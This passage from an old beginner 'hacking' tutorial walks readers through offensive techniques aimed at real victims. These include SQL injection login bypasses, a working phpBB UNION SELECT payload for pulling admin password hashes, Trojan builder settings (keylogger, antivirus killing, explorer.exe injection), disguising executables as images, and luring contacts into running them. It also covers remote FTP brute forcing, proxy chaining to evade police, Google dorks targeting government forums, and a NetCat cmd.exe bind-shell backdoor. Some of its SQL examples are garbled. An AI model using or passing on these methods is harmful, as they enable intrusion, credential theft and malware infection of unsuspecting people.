INSERT INTO (Drinks) VALUES ('Mountain Dew", 4)

So basically we insert a new drink, as well as the number 4 which would be placed into the Price column which is adjacent to the Drinks column. What if we wanted to edit or update something stored in a table? Well, you would do the following:

UPDATE Drinks SET Price = 3 WHERE Drink = 'Mountain Dew'

So now you know how to read information from a table and even write to it, but of course if your a malicious hacker you will be wanting to delete some stuff as well (I don't encourage it.) Let's say you hated Mountain Dew:

DELETE FROM Drinks WHERE Drink = 'Mountain Dew'

Yay! Mountain Dew is no more!

What if we wanted to delete the whole table? Well that's very simple and the chances are you would be able to work it out yourself.

DELETE FROM Drinks

Simple as that! There are some things I didn't mention during this part of this text, first I didn't mention that with some SQL database software you need to put a semicolon at the end of each block, example:

DELETE FROM Drinks WHERE Drink = 'Mountain Dew';

Also, with some data base software, when using the LIKE statement you have to do:

LIKE '%XL%'

Instead of the usual:

LIKE '*XL*'

That's basically it, now you know the very basics of SQL! Why you needed to learn this, will probably become apparent later on.

SQL INJECTION:

If you have read the section in this text, about SQL then you should now know the basics of the SQL language, a lot of web based software and websites use SQL, that is why it is important to learn it. SQL Injection is a very common exploit used by a hacker, a server can be fully patched, running all the latest software along with a firewall, and a hacker still gain access via SQL Injection, that is why it is so important to learn about SQL Injection. This is only a short tutorial on SQL Injection, so don't expect too much, maybe I'll write a separate full guide to SQL Injection in the future.

What? Is SQL Injection:

Many websites and web based software take input from users, it is possible to send carefully crafted information as input, and inject extra characters or special commands in order for a hacker to gain access to something he or she is not usually allowed access to, such as a database of passwords.

What is Vulnerable:

What is vulnerable? Well this is hard to say, generally what you would be looking for are pages where a user would login. Pages that end in /login.php or /login.asp would probably be what you would be looking for. Web based software such as forums are particularly vulnerable to SQL Injection, forum software usually allows each user of the forum to login (if this isn't that case, then what kind of forum is it?) You usually have a username and password box where the user types his username and password for the forum. Surprisingly most SQL Injection vulnerabilities that are in forum software don't actually have anything to do with incorrect input from the login page.

The Injection:

Let's say you use a web based email service, called Hello Email, this is just an example of course. You go to login, after you have entered your username you have access to your email. Generally if you were to use Hello Email the query that would be sent to the SQL data base would be: SELECT FROM users WHERE user = '[email protected]' AND password = 'bba3d6634ded1a7e8b10cbc715330cb7'

That's just an example, what that would do is first check if the email was correct, it would then check if the password you entered (which was converted to an MD5 hash) was the same one as the one stored inside the SQL database, if "user" and "password" evaluated to true, then it would allow you access to your web based email. The key thing I said above, that you should take note of is "if "user" and "password" evaluated to true"

It is possible to make an SQL statement return true, by using some extra parameters. Let's try some injection (your going to have to use your imagination) http://helloemail.com/login.asp%20SELECT%20FROM%20users%20WHERE%20 user%20=%20'[email protected]'%20AND%20password%20=%20 'bba3d6634ded1a7e8b10cbc715330cb7'%20OR%201=1'

It is possible if the above exploit was used in a real life situation that it would work, why is that though? You should of noticed two things, first that between each statement is %20, your probably wonder what that is for, well %20 is basically means a space between each statement. Second at the end of the whole statement you should have noticed "OR 1=1" as you probably know, 1 does equal 1, meaning the SQL statement evaluates to true, meaning it is possible you could get access to some sensitive information.

There are other things except for 1=1 that you can use, such as x=x or a=a. Try making some up by yourself.

What is another query what we could use to try and trick the database into spitting out some sensitive information? http://helloemail.com/login.asp%20SELECT%20FROM%20users%20WHERE%20 user%20=%20'[email protected]'%20AND%20password%20=%20 'bba3d6634ded1a7e8b10cbc715330cb7'%20OR%201=1--'

You should notice on the end of the query is "--", because it put that on the end of the query, when the query was processed anything after that was not processed, meaning that because the statement is not checked properly we *may gain access to something sensitive.

When attempting SQL Injection, you must always put a single quote before and after the piece of information you wish to send, because then the data basing software can tell where the end of that piece of information is, which of course is important to note, and if you haven't already guesses it is possible to exploit that.

Let's say we were going to try the following Injection, and the following information is stored in the database:

Emails ------User Pass Aelphaeis secret

If we were to try the following: http://helloemail.com/login.asp%20SELECT%20FROM%20Emails%20WHERE%20User %20=%20'Aelphaeis'%20AND%20password%20=%20'secret'

That would most probably log us in as User Aelphaeis because we had the username and password correct.

Suppose we were to try the following command (I won't bother with a URL)

SELECT FROM Emails WHERE User = Ael'phaeis AND Pass = 'secret'

The database would probably spit out some error like

Server Error: Incorrect Syntax near 'phaeis'

It thought we were requesting User phaeis instead of Aelphaeis.

Let's say we wanted to gain access to something, but we only knew part of the password, we could possibly use the following commands:

SELECT FROM Emails WHERE User = 'Aelphaeis' Pass =';

This would select the user Aelphaeis from the database, and give a password, however the password would not contain anything, and after it would be a semicolon which would tell the database that, that is the end of the statement, so possibly the password would NOT be checked!

So an exploit URL could be: http://helloemail.com/login.php%20SELECT%20FROM%20Emails%20WHERE%20User %20=%20'Aelphaeis'%20AND%20Pass%20=%20';--

TROJANS:

I’m sure you know what a Trojan is, if not search Google for “what is a Trojan” after reading a bit about Trojans continue reading the rest of my text. If you have never used a Trojan before and have not started coding one I suggest you play around with a couple that other people have coded, many people will call you a script kiddie for using them but you can learn a bit from using them, remember I said a bit, meaning fuck all really but none the less you should learn a bit. Now download a Trojan, from somewhere, if you don’t know where to get one you can download one from Cruel-Intentionz.net or EvilEyeSoftware.com. If you didn’t know what a Trojan was I asked you to search Google and find out, so you should of, now open up your Edit Server or Build Server. There should be lots of boxes, where you can put information, ill list below what each one means so you can fill them in, remember though not all the things listed below will be in the Trojan your using, and some things in the Trojan may not be listen below.

Port: What port will the Trojan listen on.

Name: Name of Victim or what ever you want to name Trojan server.

Password: The password you want to use for connecting to the server or editing it.

Start Up: Each time there computer restarts the Trojan server is closed, on reboot how do you want the Trojan server to start back up again. Best to tick all the options incase one or more of them fails.

Install Name/Install Path: The file name of the server and/or where you want to install your Trojan server to on the victim’s computer.

Install Directory Windows or System Folder: Do you want your Trojan to install itself to the Windows folder or system folder?

Server Icon: What icon do you want your Trojan server to have?

Melt Server: When the victim clicks on the Trojan server do you want it to delete it self after it’s copied it self to the WINDOWS folder or what ever.

Fake Error Message: A Message that will come up on the victim’s computer when they click on the server. The victim is tricked into thinking the file you sent them has an error in it.

Kill AV/FW: Do you want the server to try and stop Anti-Virus and Firewalls from running on the remote computer?

ICQ Notify: If you have an ICQ number and you use ICQ put your number in there and when the victims computer connects to the Internet it will send you a pager with the victims IP Address and other details so you can connect to them with a Trojan. SMTP Server: If your going to use Email Notify, then you will need an SMTP server for the Trojan to connect to, so it can send you an email with information in it, if you have an email address you want the information sent to search on Google for its SMTP server, e.g. “Yahoo SMTP Server” and you should find the SMTP server address for it.

Email Address: What email address do you want the victims IP Address and such sent to?

SiN Port: Don’t worry about it, don’t bother using SiN notify it’s too risky, you might get busted.

Make Server Visible: The server will be visible and the victim will be able to exit it, only good if you’re testing the server on your computer.

Enable Offline Keylogger: Log the keys the victim types, so when you connect you can retrieve them.

Only Open Port When Online: The Trojan will only start listening for connections if the victim’s computer is connected to the Internet.

Inject Into Explorer.exe Do you want the server to inject itself into the windows explorer, so its invisible to the task manager and bypasses firewalls by going through windows explorer. Note* Injected Trojan servers are a lot harder to remove than normal.

Direct Or Reverse Connection: Set it to Direct connection, reverse connection is when the server connects to the Client, this is normally used if the victim is behind a or is on LAN. To use reverse connect, your IP Address must always stay the same or you must use some sort of DNS software. You’re a beginner don’t worry about reverse connection, its too risky anyway.

Build Server/Save Server: Make your Trojan server.

After you have made your Trojan server, it’s time to try and trick someone into accepting it and click on it. The best way to do this, is just to get someone of your MSN list, then say something like, hey I got this cool screensaver do you want it, then sending the file, they click on it and then you can connect to them using your Trojan client and control there computer. That’s basically it for Trojans, remember using someone else’s Trojan is NOT hacking, I do not recommend you get stuck into using other peoples Trojans and such, you will only be a stupid script kiddie. FAKING/HINDING EXTENSIONS:

I have seen people on many forums asking on how to fake an extension, the reason (I assume) most people want to do this is so they can send someone a trojan or virus and make it look like a safe file type. Most people with advanced computer knowledge will not accept executable files from people they don't know, and for good reason they have no idea what the file will do when it is executed. For those of you who don't know executable files are files that don't need any other program to run, they can run independently. Some executable file types are:

*.exe *.pif *.bat *.com *.vbs *.scr

Some safe files types are:

*.jpg *.jpeg *.mpg *.mpeg *.avi *.wmv *.bmp *.wav *.mp3 *.wma *.gif *.png *.doc *.txt *.pdf

Although all of the above file types are generally safe, you must remember every now and then (not often) vulnerabilities are found in software like Adobe Acrobat Read where an attacker can hide code inside the file, then execute it. The key thing is to remember NOT to accept files from people you do not know, not matter what extension and make sure that when you are accepting files from a friend that you know for sure that the person your talking to or opening an email from is actually your friend and not someone who has manage to forge his email or address or guesses his IM Password.

Below are some methods you can use to hide or fake an extension, remember these don't actually make it so you can turn an exe into a jpeg and execute it properly, all they are, are methods that you can use to deceive the average person with.

1. Name your file mypicture.jpg.exe

2. Name your file mypicture.jpg .exe

(Put a large space between .jpg and .exe)

3. Open up Word Pad, and drag your .exe file into it.

1. Right Click on Server.exe 2. Go to Package Object 3. Then Edit Package 4. If you wish you can insert a custom icon 5. Go to Edit then Copy Package 6. Go to your Desktop and press CTRL + V 7. Rename your file to example.jpg or example.mpg

You may wonder why this hides the extensions, the reason is by default Windows the .shs extension and this is what your file has now been converted to, I believe MSN does not allow you to send .shs files.

OBTAINING IP ADDRESSES: How to obtain a person's IP Address is a commonly asked question by beginners to Internet Security, below I will list ways you can use to get someone's IP Address.

1. Send the person a file or start webcam session or audio conversation over your Instant Messaging program. Then open up Command Prompt and type netstat, this will list a list of DNS's, this is helpful because if you knew they were using AOL you would look for an AOL DNS e.g. pp134.1232.america.aol.com You can resolve this into an IP Address by. Before doing this make sure all other programs that are accessing the Internet are shutdown so you do not have a whole list of DNS's to look through. If you wished to get a list of IP Addresses instead of just DNS's type netstat -n

2. Tell the person to ping you then check your firewall to get there IP Address.

3. Ask the person to visit a website, e.g. http://youripaddress/ Some people may fall for this and try to go to that website, of course if you have a firewall, your firewall will log them trying to log on at Port 80. You could also use a URL Redirection service (I think) to make it easier to fool them, although it's possible you may get the IP Address of the URL Redirection service and not there IP.

4. Get the person to send you an email, then get there IP Address of the email. If your using Outlook you can get there IP Address by viewing the properties of the email sent. If your using Hotmail, before getting them to send the email go into your Hotmail options, there somewhere should be a section where you can set how much information on an email you can see, so when you get there email it will say there IP Address there DNS and some other information.

5. Go to http://statscounter.com And get a stats viewer for your website (which you will set up) after you have set up your stats viewer, login to your stats4all account and have a look at the IP Addresses that have visited your website (after the person has visited your website which of course will have your stats viewer on it.

6. Open up Angry IP Scanner or another IP Scanner that shows the NetBIOS names of the computers is scans, scan the persons IP Range, looking for there NetBIOS name. If there IP Address last time you had it was 129.99.78.10 You would want to scan from 129.99.0.0 to 129.99.255.255

7. Ask the person for their IP Address, sometimes this may work, although I have never tried it myself.

8. Code a program and some how manage to get it on there computer, e.g. sending it to them and telling them it's something, else this program could send you there IP Address. If your not a very good programmer you could simply make the program connect to your computer, and then you could get there IP Address from your firewall logs.

9. Get them to log onto some sort of server set up by you and then obtain there IP Address.

10. Ask a admin on a forum or something similar to give you their IP Address, IF you do have a legitimate reason for wanting there IP Address they may give it to you.

SHORT DoS FAQ:

What is Denial of Service? A DoS Attack is when an attacker uses another computers bandwidth or CPU to max out the bandwidth and/or CPU of another computer/server. A DoS Attack is usually accomplished when an attacker floods a target server with garbage data which saturates the connection and uses up the targets bandwidth therefore denying service to legitimate users trying to access the server. There are different levels of DoS attacks and below I have listed them and explained them.

DoS:

A DoS attack is when the attacker launches an attack from his or her own computer, this is done by sending packets of data to the remote computer, for each packet sent the target machine receives one, this is a very uncommon form of denial of service because the attack most of the time is very unsuccessful and at times can be easily traced. DoS attacks are usually carried out by amateur script kiddies who have no idea what the “hacking tool” there using actually does at all, they think they have a chance of taking down a web server just using there own computer, most of the time the script kiddie finds out there wrong and moves on to use another “hacking tool” or possibly uses tools to perform DDoS (Distributed Denial Of Service) attack(s)

DDoS:

DDoS (Distributed Denial of Service) attacks are the most common form of denial of service an attacker uses. If an attacker wishes to launch a Denial of Service attack, he infects thousands or even tens or hundreds of thousands of machines with a bot, usually this bot logs into an IRC chat room from the infected machine and waits for the attacker to give commands, the attacker then types in a command for example “$flood ICMP www.yahoo.com” the bots in the IRC room receive this command and send ICMP packets to the remote target, because the attacker has so many bots and the bots are on fast servers the attack is often successful in shutting down the remote target or denying service to legitimate users trying to access that server. Sometimes the attacker chooses to manually infect victims that he or she can use for attacks, the attacker usually does this by making an IRC bot that goes into IRC rooms and uses social engineering to get people to visit a website that exploits a security hole in Internet Explorer (generally Internet Explorer because its so insecure) and downloads his bot onto there computer. Recently building up a large “army” of bots to use for attack has become quite easy, there are many bots on the Internet available for download such as Forbot, RxBot and Agobot, these bots spread by scanning the internet for certain ports/services and attempting to exploit them and infect the remote computer, this type of spreading can be very useful when the bot is using a 0day exploit. DoS bots usually have standard flooding, such as ICMP, UDP, TCP, and SYN Flooding.

DRDoS:

DRDoS (Distributed Reflected Denial of Service) is quite an uncommon type of denial of service attack because usually it is not required to take down a large server, although was used once by the infamous “Mafia Boy” who took down cnn.com, yahoo.com, amazon.com and ebay.com DRDoS is when an attacker sets his bots to flood different Inter- mediate hosts with spoofed packets, for example the attacker sets half his bots to flood yahoo.com with spoofed ICMP packets and half ebay.com with spoofed ICMP packets, the spoof packets look like they have come from microsoft.com so yahoo.com and ebay.com unknowingly flood microsoft.com, because the source of these packets is spoofed, ebay.com and yahoo.com will reply to the spoofed source, for each packet the attacker sends to yahoo.com or ebay.com its possible that yahoo.com or ebay.com may have thousands of machines on the same IP Address, each of these machines will reply to the spoofed ICMP packet, therefore amplifying the power of the attack greatly. Below I have inserted a diagram showing how DRDoS works. Red Lines: Connection from attackers from computer to zombie’s computer that the attacker uses to tell the zombies to attack.

Blue Lines: Zombies sending spoofed ICMP packets, these ICMP packets look like they came from the Internet Core router the attacker wishes to attack. Green Lines: Each of the computers connected to ebay.com, yahoo.com, cnn.com and Amazon.com are replying to the spoofed ICMP packets, therefore, flooding the Internet core router.

Note: I doubt very much someone would be able to use cnn.com or any other website like it as a inter-mediate host, however there are big networks out there that could used for reflecting packets off.

A SHORT BUFFER OVERFLOW FAQ:

What is a Buffer Overflow? To put it simply a Buffer Overflow is when an attacker sends/inputs data larger than what can be stored in the buffer of the receiving program, the extra data is then written past the Buffer and the attacker usually overwrites certain data in the programs memory (the return point checker) and places his own code to be executed, then executes it, usually the attacker will grant himself a shell which he could Telnet to. Example: You have a memory buffer that can hold 256 bytes, and information that is sent through a socket is sent that is larger than 256 bytes, what happens? The 256 bytes is filled up and the rest of the data is stored adjacent to the 256 bytes in memory, of course if the attacker overwrites certain parts and manages to get his code executed, then big trouble could spawn from this. What an attacker usually does is overwrite the return point checker address, so when the function that the program is on is terminated or rather switched to another function (another function is called) the return point checker would point to a section in memory where the attacker has his code stored and the code would be executed and would have the same rights on the machine as the exploited program, admins often make the mistake of running certain software e.g. Apache as root on there machines. The most common type of vulnerability in software would have to be the buffer overflow, nearly all software products out there at one time or another have suffered from buffer overflows including Windows, Apache and numerous FTP programs. What do programmers do or should I say what do some programmers do in order to protect their software there coding from buffer overflows? Well, some use a compiler called Stack Guard which prevents "stack smashing" from occurring others just make sure there program checks all data which is inputted to it to make sure it is not larger than a certain size or what ever size the memory buffer is. Program data is stored in a stack, just like a stack of books, pointers in the program contain the address of the piece of memory at the top of the stack and the bottom of the stack is set at a fixed address in memory. I'm sorry if I haven't explained this section properly; I have a big problem sometimes with putting knowledge from my brain on to paper.

USING PASSWORD CRACKERS:

Below I will explain how to crack the following passwords:

1. DES 2. MD5 3. FTP

For the purpose of learning, let's find a DES encrypted password to crack using Google: inurl:passwd.txt This is one of the search results I came across: iss:aeczIj3e6GLso iss:aeczIj3e6GLso. internet.humboldt.k12.ca.us/issboard/passwd.txt - 1k -

Let's crack that shall we? First we need a DES password cracker, John The Ripper can be downloaded from: http://www.openwall.com//john/b/john-16w.zip You can get a Dictionary text file or what ever you would like to call it from: http://www.hackersplayground.org/cgi- bin/linkcount.cgi?site=papers&link=hackersplayground.org/wordlists/bigd ict.zip

Or an even bigger one from: http://www.hackersplayground.org/cgi- bin/linkcount.cgi?site=papers&link=hackersplayground.org/wordlists/crac klib.zip

Once you have downloaded John The Ripper unpack it, as well as one or both of the dictionary files you downloaded.

You can use John The Ripper by:

1. Opening CMD 2. Drag John.exe in there 3. Put a space 4. Put -wordfile: 5. Drag your dictionary file in there (the .txt that) 6. Put a space 7. Make a file .txt file with the encrypted password in it, in this case the encrypted password (including username) would be: iss:aeczIj3e6GLso 8. Drag the .txt file you made with the encrypted password in it into cmd, and press enter

You should find the password was: admin And of course the username was: iss

Ok now it is time to learn how to crack MD5 encrypted passwords. You can download a good MD5 crack from: http://www.oxid.it/downloads/ca_setup.exe

Where can we get an MD5 hash from? Well one piece of software that utilizes MD5 encryption is phpBB, which incase you don't know is forum software. Let's get us some MD5 hashes, we can do this using Google. Well let me correct myself, we used to be able to use Google to do this, however if you type "Powered By phpBB 2.0.3" Google will not do the search query, however that doesn't mean other search engines can't. http://altavista.com, so type "Powered By phpBB 2.0.3"

AltaVista found 1,200,000 results Not bad hey? Out of all those forums, I would say at least 1 in 10 are going to be vulnerable, to find some vulnerable pages you might want to go a dozen pages back, because the chances are hackers have already defaced the first few pages of forums. Here is a phpBB exploit: http://example.com/phpBB/privmsg.php?folder=savebox&mode=read&p=99&pm_s ql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user _password FROM phpbb_users WHERE user_id=2 LIMIT 1/*

Make sure you get the location of privmsg.php correct because that is the module that you wish to exploit. Once you have successfully gained an admin password it is time to crack it, although you could deface the forum by making a cookie with the MD5 hash inside, the point of this section of this text is not to teach you how to deface forums, rather to teach you how to crack an MD5 hash. An example of an MD5 hash is: 21232f297a57a5a743894a0e4a801fc3

For the sake of learning how to crack MD5 password's let's just crack the hash I have given you using the MD5 Cracker you downloaded. Open up Cain and Abel: This is the screen where you need to be located at, to insert that MD5 hash I gave you right click and click Add to List, then type in the MD5 hash. Now it's finally time to crack the hash, now that you have the hash listed, we are going to try a dictionary attack, but before we can do so, we must pick a dictionary file to do so. As you should be able to see, this is the screen where you select your dictionary file from, you can also choose some variations below, this alter the passwords tried on the MD5 hash, thus making the attack more probable in success, although it will take longer to crack the hash.

Now that you know how to crack encrypted passwords I am going to teach you how to crack FTP Passwords, the major different between this and other types of cracking is that the other types of cracking are cracking a local file, this however will be cracking a remote FTP server, this is different because:

1. It's using a TCP/IP Connection using the FTP protocol to brute force the password remotely.

2. Some FTP servers are set up with Anti-Cracking software, therefore after trying a number of passwords your IP Address will be banned and therefore you will not be able to continue cracking (unless you change proxy.) 3. Because your making a connection to an FTP server there is a chance of being caught while cracking.

For this text, I am going to teach you how to use a program called Brutus. You can download Brutus from: http://www.hoobie.net/brutus/brutus-aet2.zip

Above is a screenshot of Brutus this is how you would want your program set up for FTP Brute forcing, If you have read above you would of read that the default port for FTP is 21, that's why I have set Brutus to use that, unless you know FTP is on a different port don't bother changing, also note that not all web servers run FTP. Above I have highlighted an Important part of Brutus, obviously if your going to be using Brutus the chances are it's from your own computer, meaning your attack could be easily traced back you, although I must note, admins that allow FTP Brute Forcing to take place probably wouldn't bother to try and trace you down after you launched an attack (especially if you live in another country.) If you wish to get some good proxies I recommend: http://web-hack.ru http://checker.freeproxy.ru After you have got your desired proxy click Define and whack your relevant information into Brutus. After you have finished setting up Brutus simply press Start and watch Brutus work its magic, if your on a decent ADSL connection and your using a fast proxy you should be able to do 1 password a second or more, in other words 3,600 passwords an hour (If your cracking at 1 password a second.)

PROXIES AND ANONYMITY:

So what is a proxy, well a proxy is a remote computer that has been setup so that you can connect to it and run all your programs through the so that your IP Address is hidden. The way it works, is that you connect to the proxy, you tell it want you want to do, e.g. load a webpage, it loads the webpage then sends the webpage back to you, so your IP Address is hidden. So how can you use a proxy, below is a screen shot of where to put the proxy address and port it uses:

Ok, so now you know where to put the proxy server you plan to use to hide your IP Address, but where can you get one? Search on Google for public proxies, before long you should find a site with a list, try each one, remember some proxies do not work either because there offline or because to many people are connected to them already so you have to find another one, if the one you try isn’t working. Remember HTTP proxies only work with HTTP, FTP proxies only work with FTP, you get the picture. So now you know how to cover your IP address when visiting websites, although I must note one thing, most public proxies keep logs, so if you do anything illegal you will most probably be tracked down. Now that you know how to cover your IP Address when visiting websites I’m sure you would like to know how to cover your IP Address when using “hacking” programs and such? Well to do this you need a program called SocksCap, which can be downloaded from: With Socks Cap you can make just about any program that uses TCP or UDP connections route all there networking calls through a socks server. If you want some proxies go to the following websites: http://stayinvisible.com Use only Highly Anonymous proxies, and try to use the ones in fucked up countries such as Brazil, Argentina, Turkey and so on. http://web-hack.ru Has some real good proxies, not only are they fast, but if you whois them you can’t get any info on them, meaning the feds will have a hard time tracking you down. BTW Web Hack is a Russian website so you might want to use some sort of translator e.g. AltaVista. For those of you who want to chain proxies, you can do so by putting them one after another in the box where you put your proxies e.g. 202.61.176.55:80 202.234.12.87:3128 211.55.44.33:8080 You can chain a maximum of 3 proxies, don’t ask me why that is, that just the way retarded Windows works isn’t it? If you wish to chain proxies, in your web browser you can do: 202.61.176.55:80 202.234.12.87:3128 http://google.com That’s basically it for the anonymity section, remember chaining proxies does not ensure that you are 100 % anonymous. Sometimes websites are able to get your IP Address by using a java applet, you can disable java by going to Internet Options, then Security, then highlight Internet then go to Custom Settings, then set it to High, below is a diagram showing you how to change the settings. You may notice when setting your security level to this high, you may not be able to do certain things, however it will disable Java so they won't be able to trace you using a Java applet.

GOOGLE HACKING:

Introduction:

It is possible to use Google for malicious purposes, Google can be used to find Vulnerable files that are not ment to be made public as well as outdated and insecure web based software, obviously outdated software is usually full of vulnerabilities that can be easily exploited. The reason why Google can be used for hacking more than any other search engine is because of it's search parameters, which I am going to detail below. site:

By using the "site:" command you can search for pages with in certain domains, let's say we wanted to search for a news article on CNN. site:cnn.com George W Bush

The above command when typed into Google, would search Google's database of CNN web pages for the phrase "George W Bush" allintitle:

Using this Google command you can find phrases within the title of a website. allintitle:Web Admin

Using the above command we could search for pages with Web Admin in there title, of course if you haven't already guessed might bring up some vulnerable pages. intitle:

This is similar to allintitle the only difference is that you can search for phrases in a web sites title as well as something with in the websites page. intitle:Admin admin:d81jk123kl1231

The above command would search for pages with "Admin" in there titles and then would search the websites pages for admin:d81jk123kl1231 This is just an example of course, this probably won't bring up anything interesting. allinurl:

Using this command you can search for web pages that contain something in there URL, for example: allinurl:passwd.txt

This would search Google for all URL's that contain "passwd.txt" If you whack that into Google you should come up with something interesting, nothing much though. inurl:

This of course is similar to allinurl, using this command you can search for a particular part of a URL as well as something with in the page or file your searching for. Example: inurl:password.ini Admin:ae80ajaakasdf

The above command would search for websites with password.ini in there URL and then search for Admin:ae80ajaakasdf inside of that file or page. There are some other Google commands, but I won't bother explaining them, since this is only a short tutorial on Google Hacking.

Now that you know about the Google Commands, it is time to do some search for vulnerable websites and files using these commands. Have you ever seen a defaced phpBB forum? The chances are that you have, SQL Injection vulnerabilities are discovered in phpBB every few months, many people fail to upgrade or patch there board against the exploit that has been released, and guess what? We can use Google to find these forums that are vulnerable, using the following search query:

"Powered By phpBB 2.0.1 Copyright 2001, 2002"

Using the above search query, with out even using an Google commands we are able to find literally hundreds of thousands of vulnerable forums. Not impressed by the power of Google yet?

Using the above Google Hack, you could hack a lot of forums and I mean a lot, however what if we wanted to narrow that down? By using the site: command we could narrow that down to a certain domain: site:gov "Powered By phpBB 2.0.1 Copyright 2001, 2002"

That would search for government websites running old versions of phpBB, you wouldn't expect Government servers to running such insecure software, however Google shows us that some Government websites do indeed use outdated and insecure software. You may find sometimes when you type in a search query, Google will not allow you to do a search for it, this is because the query has been identified as a Google Hack or what ever you would like to call it, if this is the case you may wish to change your query, to something like "By phpBB 2.0.1" instead of "Powered By phpBB 2.0.1 Copyright 2001, 2002"

Now that you have played around with the "site:" command let's try searching for different files types, for those of you who don't know Microsoft FrontPage saves encrypted passwords as .pwd, and yes! we can use Google in order to retrieve these, we could use any of the following queries: filetype:pwd admin filetype:pwd administrator filetype:pwd administrators filetype:pwd authors filetype:pwd service

We could also use the inurl command to retrieve some interesting files. inurl:admin.pwd inurl:service.pwd inurl:authors.pwd Now that you know the basics of Google Hacking, I am going to list below some Google Hacks, remember if you alter this Google Hacks (use different commands and such) it is most likely you may get different and better results, there for finding more vulnerable servers/files. I must say Google Hacking is hardly real hacking, although it can be fun, so enjoy!

Below is a list of Google Hacks:

_vti_inf.html service.pwd users.pwd authors.pwd administrators.pwd shtml.dll shtml.exe fpcount.exe default.asp showcode.asp sendmail.cfm getFile.cfm imagemap.exe test.bat msadcs.dll htimage.exe counter.exe browser.inc hello.bat default.asp\ dvwssr.dll cart32.exe add.exe index.jsp SessionServlet shtml.dll index.cfm page.cfm shtml.exe web_store.cgi shop.cgi upload.asp default.asp pbserver.dll phf test-cgi finger Count.cgi jj php.cgi php nph-test-cgi handler webdist.cgi webgais websendmail faxsurvey htmlscript perl.exe wwwboard.pl www-sql view-source campas aglimpse glimpse man.sh AT-admin.cgi AT-generate.cgi filemail.pl maillist.pl info2www files.pl bnbform.cgi survey.cgi classifieds.cgi wrap cgiwrap edit.pl perl names.nsf webgais dumpenv.pl test.cgi submit.cgi guestbook.cgi guestbook.pl cachemgr.cgi responder.cgi perlshop.cgi query w3-msql plusmail htsearch infosrch.cgi publisher ultraboard.cgi db.cgi formmail.cgi allmanage.pl ssi adpassword.txt redirect.cgi cvsweb.cgi login.jsp dbconnect.inc admin htgrep wais.pl amadmin.pl subscribe.pl news.cgi auctionweaver.pl .htpasswd acid_main.php access.log log.htm log.html log.txt logfile logfile.htm logfile.html logfile.txt logger.html stat.htm stats.htm stats.html stats.txt webaccess.htm wwwstats.html source.asp perl mailto.cgi YaBB.pl mailform.pl cached_feed.cgi global.cgi Search.pl build.cgi common.php show global.inc ad.cgi index.html~ index.php~ index.html.bak index.php.bak print.cgi register.cgi webdriver bbs_forum.cgi mysql.class sendmail.inc CrazyWWWBoard.cgi search.pl way-board.cgi webpage.cgi pwd.dat adcycle post-query help.cgi

INDEX BROWSING:

So what is Index Browsing? Well Index Browsing is when you basically view the files of a web server, for those of you who don't know this is indeed possible and it is very easy to do. Ever wanted to break into web site hosting a certain video or images you want (yes I know your dirty little secret) well it may be possible to get access to some of these files. Let's say you have the location of a picture file http://example.com/images/jenna.jpg And you know this is the URL of an image, what you could do is type http://example.com/images/ into your web browser and press enter, if the server your trying to get into allows index browsing, which to my surprise a hell of a lot of servers do indeed allow index browsing and by default Apache supposedly allows Index Browsing. The fact is a lot of admins are lazy and don't bother to use precautions in order to stop Index Browsing from taking place. Have you got a target in mind? Well I suggest viewing the source code of the front page of the web site, (Right Click, View Source) you should have a look at all the links in there, there is a chance for example that they may store those precious videos in the same location that they store some of the images or ads of there website, and all you need to do is http://example.com/private/videos/ What if you wanted to find websites that were vulnerable to Index Browsing? Well using a Google Hack we can, simply open up Google and type "Index Of/" + "what ever"

Google would then search for pages that contain "Index Of/" which of course would be Index pages, if your wondering why I put "what ever" there for, that's just an example, you would replace "what ever" with what ever you were looking for, you never know you might just get lucky. The chances are if the web site allows Index Browsing it is quite insecure and sooner or later some is going to break into it, so I suggest you use a Proxy when Index Browsing, just incase someone gets Write Access to there files and defaces there web page or what ever.

BASIC NETCAT TUTORIAL:

So what is NetCat? NetCat is a network tool that reads and writes data across connections it uses both the TCP and UDP Protocol, NetCat was originally coded in 1998 by a guy who called himself Hobbit it was then ported to Windows by a member of the l0pht hacking group (NetCat was originally written for Unix operating systems.) Although NetCat is an old tool, it is still used today by the majority of hackers, NetCat can be used to do a number of things, some of which are:

Port Scanning Making TCP Connections Sending Data and Receiving Via UDP Transferring Files

NetCat is similar to Telnet (It's a TCP/IP Client) but has lots of extra features that us hackers use all the time. The first thing we are going to learn is how to transfer a file using NetCat. NetCat can be both a Client and a Server, first we are going to set up the server.

C:\nc.exe -l -p 23 < filename

Put NetCat on your C:\ Drive. I will now explain what the above does, -l tells NetCat to listen, -ip is an argument that tells NetCat what port to listen on, and 23 as you should of guessed is the Port that NetCat is listening on, < filename gives NetCat a file, this file will be transferred to the Client when the Client requests a file. Now for the Client side of things:

C:\nc.exe -vv 127.0.0.1 23 > C:\Hello.jpg

This transfers the file that the Server has and saves it to the C:\ Drive as Hello.jpg, it is important to note if we did not put C:\Hello.jpg (The output file) that we would get a whole bunch of ASCII characters, sometimes you may want to do this.

Another thing NetCat is capable of doing is Port Scanning, although there are Port Scanners to do this for you, if you have rooted a box and have NetCat and you use NetCat to scan a host, and possibly the admin might not spot NetCat as much as he would a Port Scanner. We can port scan something use NetCat by doing the following:

C:\>nc.exe -vv -z -w2 127.0.0.1 1-100

This would scan 127.0.0.1 from ports 1 to 100, you may find scanning using NetCat is a bit slow. What do the above commands do though? -vv stands for Very Verbose which means that NetCat will send back as much data as it possibly can, -z prevents any data from being sent to the TCP/UDP Ports meaning, the scan is faster and finally w2 is the wait time for the response.

It is also possible to use NetCat as a backdoor!

C:\nc.exe -L -p 23 -e C:\WINDOWS\system32\cmd.exe

What this basically does is bind the cmd shell to a Port, it would now be possible to Telnet to that machine on Port 23 and have a Shell! Now I'll explain what each little bit of that does. -L Tells the machine to listen and keep listening even when the connection is reset. -p tells NetCat what port to listen at. -e Is used to execute a program in this case cmd.exe

Below I have listen the NetCat arguments you can pass to NetCat and what they do: -d Allows NetCat to detach from the console on Windows NT.

-e Executes a program if NetCat is compiled with the – DGAPING_SECURITY_HOLE.

-i Sets Interval time

-g Used to construct a loose-source-routed path for your connection. This is modeled after "trace route".

-G Positions the "hop pointer" within the list.

-l Tells NetCat to listen

-L Tells NetCat to listen even after the Connection is reset.

-n Forces NetCat to only accept Numerical IP Addresses

-o Used to obtain a hex dump file.

-p Required for outbound connections. The parameter can be numeric or a name as listed in the services file. If –p is not used netcat will bind to whatever unused port the systems gives it, unless the –r option is used.

